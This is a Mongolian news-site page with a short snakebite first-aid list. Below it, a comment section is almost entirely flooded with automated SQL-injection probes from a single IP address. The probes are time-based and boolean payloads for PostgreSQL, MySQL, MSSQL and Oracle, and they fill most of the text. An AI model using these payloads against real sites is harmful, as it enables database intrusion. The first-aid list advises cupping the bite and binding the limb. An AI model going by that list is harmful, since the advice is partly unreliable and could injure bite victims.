Могойд хатгуулсан үед үзүүлэх анхны тусламж

Aдмин / Эрүүл мэнд

Могойд хатгуулсан үед үзүүлэх анхны тусламж:

• Эмнэлгийн тусламж яаралтай дуудах,

• Хөдөлгөөнгүй байлгах,

• Хорыг цааш тархахаас сэргийлж боолт хийх,

• Хатгуулсан хүнд тусламж үзүүлэх гэж буй тохиолдолд цусаар дамжих халдвараас сэргийлж резинэн бээлий өмсөх,

• Хазуулсан хэсгийг цэвэрлэж, ариутгах,

• Шил, саваар бумбадах,

• Цусыг амаар соруулахаас зайлсхийх, учир нь цусыг сорсноор тусламж үзүүлэгч таньд ямар нэгэн халдвар дамжиж болзошгүй,

• Гар, хөлөнд хатгуулсан бол үеэр нугалж даавуу, самбаа тавьж боох,

• Их хэмжээгээр шингэн уулгах,

• Хазуулсан цагийг тэмдэглэх,

• Могойн зургийг авах,


Сэтгэгдэл

pHqghUme [196.196.203.214] 2022-07-08 02:57:22

1

pHqghUme [196.196.203.214] 2022-07-08 02:57:21

1

pHqghUme [196.196.203.214] 2022-07-08 02:57:18

1

pHqghUme [196.196.203.214] 2022-07-08 02:57:18

1

pHqghUme [196.196.203.214] 2022-07-08 02:57:18

1

Зочин [196.196.203.214] 2022-07-08 02:57:12

Зочин [196.196.203.214] 2022-07-08 02:57:12

pHqghUme [196.196.203.214] 2022-07-07 20:09:18

1

Зочин [196.196.203.214] 2022-07-07 20:09:18

Зочин [196.196.203.214] 2022-07-07 20:09:18

pHqghUme [196.196.203.214] 2022-07-07 18:24:25

555

pHqghUme [196.196.203.214] 2022-07-07 18:24:08

555

pHqghUme [196.196.203.214] 2022-07-07 17:54:19

1

pHqghUme [196.196.203.214] 2022-07-07 17:54:19

1

pHqghUme [196.196.203.214] 2022-07-07 17:54:16

1

pHqghUme [196.196.203.214] 2022-07-07 17:54:16

1

pHqghUme [196.196.203.214] 2022-07-07 17:54:16

1

Зочин [196.196.203.214] 2022-07-07 17:54:12

Зочин [196.196.203.214] 2022-07-07 17:54:12

pHqghUme [196.196.203.214] 2022-07-07 17:43:00

555

pHqghUme [196.196.203.214] 2022-07-07 17:42:45

555

Зочин [@@e7BEl] 2022-07-07 15:41:42

Зочин [1] 2022-07-07 15:41:42

Зочин [1'"] 2022-07-07 15:41:42

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 15:41:41

Зочин [qBT5v5ic')) OR 667=(SELECT 667 FROM PG_SLEEP(15))--] 2022-07-07 15:41:29

Зочин [uoHjfq8b') OR 731=(SELECT 731 FROM PG_SLEEP(15))--] 2022-07-07 15:41:16

Зочин [9Uz7slxs' OR 520=(SELECT 520 FROM PG_SLEEP(15))--] 2022-07-07 15:41:04

Зочин [WI0HF1Ss'; waitfor delay '0:0:15' -- ] 2022-07-07 15:40:52

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-07 15:40:40

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 15:40:28

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 15:40:16

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 15:40:04

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-07 15:39:52

Зочин [@@Re2Un] 2022-07-07 15:39:46

Зочин [1] 2022-07-07 15:39:45

Зочин [1'"] 2022-07-07 15:39:45

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 15:39:45

Зочин [-1" OR 2+690-690-1=0+0+0+1 -- ] 2022-07-07 15:39:40

Зочин [-1' OR 2+86-86-1=0+0+0+1 or '1zfJ6btQ'='] 2022-07-07 15:39:39

Зочин [-1' OR 2+793-793-1=0+0+0+1 -- ] 2022-07-07 15:39:39

Зочин [-1 OR 2+792-792-1=0+0+0+1] 2022-07-07 15:39:38

Зочин [-1 OR 2+514-514-1=0+0+0+1 -- ] 2022-07-07 15:39:38

Зочин [Q7g60580] 2022-07-07 15:39:38

Зочин [2Mw6ejqI')) OR 376=(SELECT 376 FROM PG_SLEEP(15))--] 2022-07-07 15:39:32

Зочин [196.196.203.214] 2022-07-07 15:39:25

Зочин [Yv7jTTwh') OR 599=(SELECT 599 FROM PG_SLEEP(15))--] 2022-07-07 15:39:19

Зочин [196.196.203.214] 2022-07-07 15:39:12

Зочин [5agelzd3' OR 208=(SELECT 208 FROM PG_SLEEP(15))--] 2022-07-07 15:39:06

Зочин [196.196.203.214] 2022-07-07 15:38:59

Зочин [196.196.203.214] 2022-07-07 15:38:58

Зочин [Ogd9OgjQ'; waitfor delay '0:0:15' -- ] 2022-07-07 15:38:54

Зочин [196.196.203.214] 2022-07-07 15:38:46

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-07 15:38:41

Зочин [196.196.203.214] 2022-07-07 15:38:33

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 15:38:29

Зочин [196.196.203.214] 2022-07-07 15:38:21

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 15:38:16

Зочин [196.196.203.214] 2022-07-07 15:38:09

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 15:38:04

Зочин [196.196.203.214] 2022-07-07 15:37:57

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-07 15:37:52

Зочин [196.196.203.214] 2022-07-07 15:37:45

Зочин [-1" OR 2+877-877-1=0+0+0+1 -- ] 2022-07-07 15:37:39

Зочин [-1' OR 2+421-421-1=0+0+0+1 or 'dJnfuN7b'='] 2022-07-07 15:37:39

Зочин [-1' OR 2+283-283-1=0+0+0+1 -- ] 2022-07-07 15:37:38

Зочин [-1 OR 2+540-540-1=0+0+0+1] 2022-07-07 15:37:38

Зочин [-1 OR 2+182-182-1=0+0+0+1 -- ] 2022-07-07 15:37:37

Зочин [UVJSGlFR] 2022-07-07 15:37:37

Зочин [196.196.203.214] 2022-07-07 15:37:32

Зочин [196.196.203.214] 2022-07-07 15:37:25

Зочин [196.196.203.214] 2022-07-07 15:37:18

Зочин [196.196.203.214] 2022-07-07 15:37:11

Зочин [196.196.203.214] 2022-07-07 15:36:57

Зочин [196.196.203.214] 2022-07-07 15:36:53

Зочин [196.196.203.214] 2022-07-07 15:36:44

Зочин [196.196.203.214] 2022-07-07 15:36:40

Зочин [196.196.203.214] 2022-07-07 15:36:25

pHqghUme [@@ZFvEF] 2022-07-07 15:36:19

1

pHqghUme [1] 2022-07-07 15:36:19

1

pHqghUme [1'"] 2022-07-07 15:36:19

1

pHqghUme [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 15:36:18

1

Зочин [196.196.203.214] 2022-07-07 15:36:11

pHqghUme [Tj1LBuiW')) OR 268=(SELECT 268 FROM PG_SLEEP(15))--] 2022-07-07 15:36:05

1

Зочин [196.196.203.214] 2022-07-07 15:35:39

pHqghUme [8uPoLMtJ') OR 105=(SELECT 105 FROM PG_SLEEP(15))--] 2022-07-07 15:35:33

1

Зочин [196.196.203.214] 2022-07-07 15:35:26

pHqghUme [wPtAuxSy' OR 314=(SELECT 314 FROM PG_SLEEP(15))--] 2022-07-07 15:35:19

1

Зочин [196.196.203.214] 2022-07-07 15:35:13

Зочин [196.196.203.214] 2022-07-07 15:35:12

Зочин [196.196.203.214] 2022-07-07 15:35:12

Зочин [196.196.203.214] 2022-07-07 15:35:12

Зочин [196.196.203.214] 2022-07-07 15:35:11

Зочин [196.196.203.214] 2022-07-07 15:35:11

pHqghUme [XCafcgxi'; waitfor delay '0:0:15' -- ] 2022-07-07 15:35:05

1

Зочин [196.196.203.214] 2022-07-07 15:34:55

pHqghUme [1 waitfor delay '0:0:15' -- ] 2022-07-07 15:34:49

1

Зочин [196.196.203.214] 2022-07-07 15:34:41

pHqghUme [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 15:34:35

1

Зочин [196.196.203.214] 2022-07-07 15:34:26

pHqghUme [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 15:34:20

1

Зочин [196.196.203.214] 2022-07-07 15:34:07

pHqghUme [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 15:34:03

1

pHqghUme [if(now()=sysdate(),sleep(15),0)] 2022-07-07 15:33:48

1

pHqghUme [-1" OR 2+412-412-1=0+0+0+1 -- ] 2022-07-07 15:33:33

1

pHqghUme [-1' OR 2+436-436-1=0+0+0+1 or 'VkucJ90x'='] 2022-07-07 15:33:32

1

pHqghUme [-1' OR 2+356-356-1=0+0+0+1 -- ] 2022-07-07 15:33:32

1

pHqghUme [-1 OR 2+941-941-1=0+0+0+1] 2022-07-07 15:33:31

1

pHqghUme [-1 OR 2+899-899-1=0+0+0+1 -- ] 2022-07-07 15:33:31

1

pHqghUme [QATdwtUq] 2022-07-07 15:33:30

1

pHqghUme [196.196.203.214] 2022-07-07 15:33:15

1

pHqghUme [196.196.203.214] 2022-07-07 15:33:02

1

pHqghUme [196.196.203.214] 2022-07-07 15:32:48

1

pHqghUme [196.196.203.214] 2022-07-07 15:32:34

1

Зочин [196.196.203.214] 2022-07-07 15:32:07

Зочин [196.196.203.214] 2022-07-07 15:31:54

Зочин [196.196.203.214] 2022-07-07 15:31:40

@@nWljd

Зочин [196.196.203.214] 2022-07-07 15:31:39

1

Зочин [196.196.203.214] 2022-07-07 15:31:39

1'"

Зочин [196.196.203.214] 2022-07-07 15:31:38

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-07 15:31:24

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-07 15:31:11

wrLPw5Th')) OR 901=(SELECT 901 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:30:57

b96ufolI') OR 330=(SELECT 330 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:30:44

3S3Z41Jn' OR 370=(SELECT 370 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:30:31

-1)) OR 437=(SELECT 437 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:30:16

-5) OR 513=(SELECT 513 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:30:08

Зочин [196.196.203.214] 2022-07-07 15:30:01

-5 OR 951=(SELECT 951 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:29:54

Зочин [196.196.203.214] 2022-07-07 15:29:49

PSEqsRct'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 15:29:39

@@5Dbtp

Зочин [196.196.203.214] 2022-07-07 15:29:39

1

Зочин [196.196.203.214] 2022-07-07 15:29:38

1'"

Зочин [196.196.203.214] 2022-07-07 15:29:38

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-07 15:29:34

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 15:29:24

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-07 15:29:21

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 15:29:11

ZCXSVJzX')) OR 629=(SELECT 629 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:29:07

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 15:28:58

dmMSBUXF') OR 117=(SELECT 117 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:28:53

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-07 15:28:44

gHsz1VCe' OR 489=(SELECT 489 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 15:28:40

1

Зочин [196.196.203.214] 2022-07-07 15:28:39

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-07 15:28:28

-1)) OR 327=(SELECT 327 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 15:28:25

1

Зочин [196.196.203.214] 2022-07-07 15:28:24

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-07 15:28:14

-5) OR 732=(SELECT 732 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 15:28:11

@@Und2w

pHqghUme [196.196.203.214] 2022-07-07 15:28:11

1

Зочин [196.196.203.214] 2022-07-07 15:28:11

if(now()=sysdate(),sleep(15),0)

pHqghUme [196.196.203.214] 2022-07-07 15:28:10

1'"

pHqghUme [196.196.203.214] 2022-07-07 15:28:10

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-07 15:28:01

-5 OR 72=(SELECT 72 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:27:58

-1" OR 2+555-555-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 15:27:57

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-07 15:27:57

-1' OR 2+397-397-1=0+0+0+1 or 'tfHAmGlt'='

Зочин [196.196.203.214] 2022-07-07 15:27:56

-1' OR 2+194-194-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 15:27:56

-1 OR 2+911-911-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-07 15:27:55

-1 OR 2+795-795-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 15:27:55

SS89hB3b

Зочин [196.196.203.214] 2022-07-07 15:27:48

jxHIE2mA'; waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 15:27:44

fEkmU20A')) OR 835=(SELECT 835 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:27:43

1

Зочин [196.196.203.214] 2022-07-07 15:27:35

1 waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 15:27:31

FWOiD6oI') OR 540=(SELECT 540 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 15:27:30

1

Зочин [196.196.203.214] 2022-07-07 15:27:22

-1); waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 15:27:18

9gdwRA7m' OR 165=(SELECT 165 FROM PG_SLEEP(15))--

@@Lrt4M [196.196.203.214] 2022-07-07 15:27:17

1 [196.196.203.214] 2022-07-07 15:27:17

1'" [196.196.203.214] 2022-07-07 15:27:16

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 15:27:16

Зочин [196.196.203.214] 2022-07-07 15:27:07

-1; waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 15:27:04

-1)) OR 441=(SELECT 441 FROM PG_SLEEP(15))--

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-07 15:27:01

Зочин [196.196.203.214] 2022-07-07 15:26:54

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

pHqghUme [196.196.203.214] 2022-07-07 15:26:48

-5) OR 139=(SELECT 139 FROM PG_SLEEP(15))--

eZ8q2mGq')) OR 661=(SELECT 661 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:26:47

Зочин [196.196.203.214] 2022-07-07 15:26:40

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

pHqghUme [196.196.203.214] 2022-07-07 15:26:35

-5 OR 160=(SELECT 160 FROM PG_SLEEP(15))--

Elx2BMWS') OR 744=(SELECT 744 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:26:33

Зочин [196.196.203.214] 2022-07-07 15:26:25

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

pHqghUme [196.196.203.214] 2022-07-07 15:26:19

Q4rL8viW'; waitfor delay '0:0:15' --

XiGd91nh' OR 920=(SELECT 920 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:26:16

Зочин [196.196.203.214] 2022-07-07 15:26:08

if(now()=sysdate(),sleep(15),0)

pHqghUme [196.196.203.214] 2022-07-07 15:26:04

1 waitfor delay '0:0:15' --

-1)) OR 430=(SELECT 430 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:26:02

Зочин [196.196.203.214] 2022-07-07 15:25:52

-1" OR 2+200-200-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 15:25:52

-1' OR 2+572-572-1=0+0+0+1 or 'DWcyT8d0'='

Зочин [196.196.203.214] 2022-07-07 15:25:52

-1' OR 2+433-433-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 15:25:51

-1 OR 2+985-985-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-07 15:25:51

-1 OR 2+476-476-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 15:25:50

63akSxqf

pHqghUme [196.196.203.214] 2022-07-07 15:25:49

-1); waitfor delay '0:0:15' --

-5) OR 147=(SELECT 147 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:25:44

Зочин [196.196.203.214] 2022-07-07 15:25:35

1

pHqghUme [196.196.203.214] 2022-07-07 15:25:33

-1; waitfor delay '0:0:15' --

-5 OR 337=(SELECT 337 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:25:30

Зочин [196.196.203.214] 2022-07-07 15:25:21

1

pHqghUme [196.196.203.214] 2022-07-07 15:25:19

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

vasZWTco'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:25:16

@@OXwO5 [196.196.203.214] 2022-07-07 15:25:07

1 [196.196.203.214] 2022-07-07 15:25:07

1'" [196.196.203.214] 2022-07-07 15:25:06

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 15:25:06

pHqghUme [196.196.203.214] 2022-07-07 15:25:05

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:25:02

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-07 15:24:51

pHqghUme [196.196.203.214] 2022-07-07 15:24:50

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:24:48

lBLkaB9b')) OR 259=(SELECT 259 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:24:37

pHqghUme [196.196.203.214] 2022-07-07 15:24:37

if(now()=sysdate(),sleep(15),0)

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:24:34

5R0sfmIy') OR 714=(SELECT 714 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:24:22

pHqghUme [196.196.203.214] 2022-07-07 15:24:22

-1" OR 2+845-845-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 15:24:21

-1' OR 2+308-308-1=0+0+0+1 or 'UqPhHzwq'='

pHqghUme [196.196.203.214] 2022-07-07 15:24:21

-1' OR 2+657-657-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 15:24:20

-1 OR 2+967-967-1=0+0+0+1

pHqghUme [196.196.203.214] 2022-07-07 15:24:20

-1 OR 2+152-152-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 15:24:20

aUHnHrIB

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 15:24:19

4Lv6UIle' OR 598=(SELECT 598 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:24:08

pHqghUme [196.196.203.214] 2022-07-07 15:24:06

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 15:24:05

-1)) OR 940=(SELECT 940 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:23:54

pHqghUme [196.196.203.214] 2022-07-07 15:23:51

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 15:23:51

-5) OR 847=(SELECT 847 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:23:40

@@BUeRZ [196.196.203.214] 2022-07-07 15:23:37

1

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 15:23:37

1 [196.196.203.214] 2022-07-07 15:23:36

1

1'" [196.196.203.214] 2022-07-07 15:23:36

1

pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 15:23:35

1

-5 OR 582=(SELECT 582 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:23:24

-1" OR 2+286-286-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:23:20

-1' OR 2+559-559-1=0+0+0+1 or 'uhCGnQol'=' [196.196.203.214] 2022-07-07 15:23:20

Z0cl1bUh')) OR 379=(SELECT 379 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:23:20

1

-1' OR 2+827-827-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:23:19

-1 OR 2+690-690-1=0+0+0+1 [196.196.203.214] 2022-07-07 15:23:19

-1 OR 2+553-553-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:23:18

SHWyImFA [196.196.203.214] 2022-07-07 15:23:18

QNK75e7u'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:23:09

SRNo3fi3') OR 327=(SELECT 327 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:23:05

1

1 [196.196.203.214] 2022-07-07 15:23:04

pHqghUme [196.196.203.214] 2022-07-07 15:22:58

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:22:56

AhRfbtJz' OR 72=(SELECT 72 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 15:22:51

1

1 [196.196.203.214] 2022-07-07 15:22:49

pHqghUme [196.196.203.214] 2022-07-07 15:22:43

1

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:22:41

YriwCitx'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:22:36

1

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:22:27

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 15:22:23

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 15:22:13

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 15:22:09

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 15:21:59

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 15:21:55

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 15:21:45

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 15:21:42

1

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 15:21:32

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 15:21:29

1

-1" OR 2+288-288-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:17

-1' OR 2+163-163-1=0+0+0+1 or '7HCALDct'=' [196.196.203.214] 2022-07-07 15:21:16

-1' OR 2+348-348-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:16

-1 OR 2+335-335-1=0+0+0+1 [196.196.203.214] 2022-07-07 15:21:16

-1 OR 2+615-615-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:15

e6RJCdor [196.196.203.214] 2022-07-07 15:21:15

-1" OR 2+550-550-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:15

1

-1' OR 2+44-44-1=0+0+0+1 or 'B2EQ0JlI'=' [196.196.203.214] 2022-07-07 15:21:14

1

Зочин [196.196.203.214] 2022-07-07 15:21:14

1

-1' OR 2+194-194-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:14

1

-1 OR 2+243-243-1=0+0+0+1 [196.196.203.214] 2022-07-07 15:21:13

1

-1 OR 2+849-849-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 15:21:13

1

SRAGSoF5 [196.196.203.214] 2022-07-07 15:21:13

1

1 [196.196.203.214] 2022-07-07 15:21:01

Зочин [196.196.203.214] 2022-07-07 15:21:00

1

pHqghUme [196.196.203.214] 2022-07-07 15:20:59

1

1 [196.196.203.214] 2022-07-07 15:20:47

pHqghUme [196.196.203.214] 2022-07-07 15:20:44

1

Зочин [196.196.203.214] 2022-07-07 15:19:59

Зочин [196.196.203.214] 2022-07-07 15:19:45

Зочин [196.196.203.214] 2022-07-07 15:17:48

pHqghUme [196.196.203.214] 2022-07-07 15:17:45

1

Зочин [196.196.203.214] 2022-07-07 15:17:34

pHqghUme [196.196.203.214] 2022-07-07 15:17:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:32

1

Зочин [196.196.203.214] 2022-07-07 15:16:27

Зочин [196.196.203.214] 2022-07-07 15:16:27

Зочин [196.196.203.214] 2022-07-07 15:16:27

Зочин [196.196.203.214] 2022-07-07 15:16:18

1

Зочин [196.196.203.214] 2022-07-07 15:16:18

1

Зочин [196.196.203.214] 2022-07-07 15:16:18

1

Зочин [196.196.203.214] 2022-07-07 15:16:18

1

pHqghUme [196.196.203.214] 2022-07-07 15:14:53

1

pHqghUme [196.196.203.214] 2022-07-07 15:14:53

1

pHqghUme [196.196.203.214] 2022-07-07 15:14:50

1

pHqghUme [196.196.203.214] 2022-07-07 15:14:50

1

pHqghUme [196.196.203.214] 2022-07-07 15:14:50

1

Зочин [196.196.203.214] 2022-07-07 15:14:46

Зочин [196.196.203.214] 2022-07-07 15:14:46


309 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
309 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.